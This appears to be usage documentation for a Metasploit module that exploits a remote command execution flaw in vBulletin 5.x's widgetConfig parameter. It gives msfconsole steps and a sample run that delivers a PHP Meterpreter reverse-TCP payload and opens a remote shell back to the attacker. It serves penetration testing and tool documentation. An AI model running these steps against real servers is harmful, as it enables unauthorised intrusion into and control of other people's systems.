vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code]
parameter in an ajax/render/widget_php
routestring
POST
request.
- Install the module as usual
- Start msfconsole
- Do:
use exploit/multi/http/vbulletin_widgetconfig_rce
- Do:
set RHOSTS [IP]
- Do:
set LHOST [IP]
- Do:
run
Id Name
-- ----
0 Automatic (Dropper)
1 Linux (Stager)
2 Windows (Stager)
3 Unix (In-Memory)
4 Windows (In-Memory)
PHP_CMD
Specify the PHP function in which you want execute the payload. Default: shell_exec
TARGETURI
The base URI path of vBulletin. Default: /
ForceExploit
Override check result.
A proof of concept was originally published on seclist.org.
msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set rhosts 192.168.1.25
rhosts => 192.168.1.25
msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set lhost 192.168.1.13
lhost => 192.168.1.13
msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > run
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Sending php/meterpreter/reverse_tcp command payload
[*] Sending stage (38288 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.13:4444 -> 192.168.1.25:35772) at 2019-10-18 13:53:39 +0400
meterpreter >